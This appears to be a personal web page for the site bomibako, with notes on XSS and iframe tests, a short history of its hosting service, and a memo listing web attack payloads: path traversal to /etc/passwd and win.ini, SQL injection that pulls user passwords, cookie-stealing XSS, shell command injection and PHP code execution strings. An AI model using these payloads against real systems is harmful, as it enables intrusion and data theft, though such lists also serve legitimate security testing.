bomibako
XSS test---
Hello!
---
Yahoo iframe display test within own domain
Image loading test using JS-generated DOM
I placed a web beacon that can apparently survey the list of shares on Twitter and the like
http://getshar.es/create
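I didn't really understand it, so I'm leaving it alone
Image loading? No, JS alert display
Just a test, nothing really
Press to get cookie
bomibako has had the following activities in the past
~2009: Free rental server
~2011: As a storage space for blogs
New registrations are suspended
If you contact us, we will handle requests individually
Memo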
'/../../../../../../../../../etc/hosts',
'/../../../../../../etc/hosts',
'/../../../etc/hosts',
'/etc/hosts',
'/../../../../../../../../../etc/hosts%00',
'/../../../../../../etc/hosts%00',
'/../../../etc/hosts%00',
'/etc/hosts%00',
'/../../../../../../../../../windows/win.ini',
'/../../../../../../windows/win.ini',
'/../../../windows/win.ini',
'/windows/win.ini',
'/../../../../../../../../../windows/win.ini%00',
'/../../../../../../windows/win.ini%00',
'/../../../windows/win.ini%00',
'/../../../../../../../var/tmp/',
'/../../../../../../../var/cache/mod_proxy/',
'/../../../../../../../var/cache/',
'/../../../../../../../var/www/',
'/../../../../../../../etc/',
'/../../../../../../../option/',
'/../../../../../../../home/',
'/../../../../../../../usr/',
'/../../../windows/win.ini%00',
'/../../../windows/win.ini%00',
'/windows/win.ini%00',
'?file=/etc/passwd',
'?file=/Windows/win.ini',
'?file=/MSOCache/',
'?file=C:\Windows\System32\cmd.exe?',
'/abc',
'/*',
'\'',
'\"',
'\,',
"'",
"' and 'a'='a'",
"test and 1=1",
"test ' or 'a'='a'",
"%",
"', \", <, and >",
"'>\">
",
"'>\">",
"",
"javascript:alert(document.cookie);",
"/../../../../../../../sbin/ifconfig|",
";/sbin/ifconfig",
"/../../../../../../../windows/system32/ipconfig|",
"&/windows/system32/ipconfig",
"'+AND+'1'%3D'1",
"'waitfor%20delay'0%3a0%3a20'--",
"'waitfor%20delay'0%3a0%3a00'--",
"''\"\"¥",
"'\"¥'\"¥",
"'+AND+'1'%3D'2",
"'+AND+'1'%3D'1",
"'++'",
"'++'’",
">
alert("XSS")',
'1%00">
◆◆◆◆◆◆◆◆◆◆◆◆<',
'',
'',
'20pt',
'XSS',
'',
'XSS part2',
'?file=http://bomibako.com/myphp.txt',
'?file=php://echo"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"',
"?heighlight=a','a',phpinfo());//",
"filter_func=preg_replace&from=/^/e&to=phpinfo();",
"?dir=| cat /etc/passwd",
"?dir=--version",
"xxx OR 1/*",
'1+onmouseover%3dalert(document.cookie)',
'"+onmouseover%3d"alert(document.cookie)',
// name may be changed; match it to a variable that exists in the system where possible
'name=");alert(document.cookie)//',
'name=\');alert(document.cookie)//',
"name='+and+cast((select+id||':'||pwd+from+users+offset+0+limit+1)+as+integr)>1--",
"name='+union+select+id,pwd,name,addr,null,null,null+from+users--",
"name=';copy+users(name)+from+'/etc/passwd'--",
"author='+union+select+table_name,column_name,data_type,null,null,null+from+information_schema.columns+order+by+1--",
"PHPSESSID=KBMJ"